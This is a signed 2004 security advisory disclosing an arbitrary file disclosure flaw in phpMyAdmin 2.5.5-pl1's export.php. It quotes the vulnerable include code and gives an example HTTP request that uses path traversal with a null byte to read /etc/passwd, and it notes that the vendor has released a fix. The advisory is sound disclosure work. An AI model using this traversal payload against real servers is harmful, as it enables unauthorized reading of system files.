home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webapp / phpmyadmin / phpMyAdmin255pl1.txt < prev   
PGP Signed Message  |  2005-02-12  |  2KB  |  84 lines

  1. -----BEGIN PGP SIGNED MESSAGE-----
  2. Hash: SHA1
  3.  
  4.  
  5.    Arbitrary File Disclosure Vulnerability in phpMyAdmin 2.5.5-pl1 and prior
  6.  
  7. ################################################################################
  8. Summary :
  9.  
  10. phpMyAdmin is a tool written in PHP intended to handle the administration of
  11. MySQL over the WWW.  There is a vulnerability in the current stable version of
  12. phpMyAdmin that allows an attacker to retrieve arbitrary files from the
  13. webserver with privileges of the webserver.. 
  14.  
  15. ################################################################################
  16. Details :
  17.  
  18. The export PHP script can be exploited to disclose arbitrary file using a
  19. include() PHP call.
  20.  
  21. Vulnerable Systems:
  22. * phpMyAdmin 2.5.5-pl1 and prior
  23.  
  24. Release Date :
  25. February 2, 2004
  26.  
  27. Severity :
  28. HIGH
  29.  
  30. ################################################################################
  31. Examples :
  32.  
  33.           -------------------------------------------
  34.  
  35. I - Arbitrary File Disclosure
  36. (HIGH Risk)
  37.  
  38. File impacted : export.php
  39.  
  40. 14:// What type of export are we doing?
  41. 15:if ($what == 'excel') {
  42. 16:    $type = 'csv';
  43. 17:} else {
  44. 18:    $type = $what;
  45. 19:}
  46. 20:
  47. 21:/**
  48. 22: * Defines the url to return to in case of error in a sql statement
  49. 23: */
  50. 24:require('./libraries/export/' . $type . '.php');
  51.  
  52. Exploit example:
  53.  
  54. - -- HTTP Request --
  55.  
  56. http://[target]/[phpMyAdmin_directory]/export.php?what=../../../../../../etc/passwd%00
  57.  
  58. - -- HTTP Request --
  59.  
  60. The vulnerability is available evenif PHP register_globals is set to off.
  61.  
  62. ################################################################################
  63. Vendor Status :
  64.  
  65. The information has been provided to the phpMyAdmin Project Managers.
  66. A new release candidate 2.5.6-rc1 with fixes for this vulnerability is available.
  67. - --> http://www.phpmyadmin.net/home_page/
  68. - --> http://www.phpmyadmin.net/home_page/relnotes.php?rel=0
  69.  
  70. ################################################################################
  71. Credit :
  72.  
  73. Cedric Cochin, Security Engineer, netVigilance, Inc. (www.netvigilance.com)
  74. < cco@netvigilance.com >
  75.  
  76. -----BEGIN PGP SIGNATURE-----
  77. Version: GnuPG v1.0.6 (GNU/Linux)
  78. Comment: For info see http://www.gnupg.org
  79.  
  80. iD8DBQFAH3dJA9/8vqmWoYQRAjNoAJ4pGgoQBT9WoyPmbfw4h/6LkcjR6wCeNBj2
  81. ekO25itz2ssIvwgf2WRb/4k=
  82. =Yuh1
  83. -----END PGP SIGNATURE-----
  84.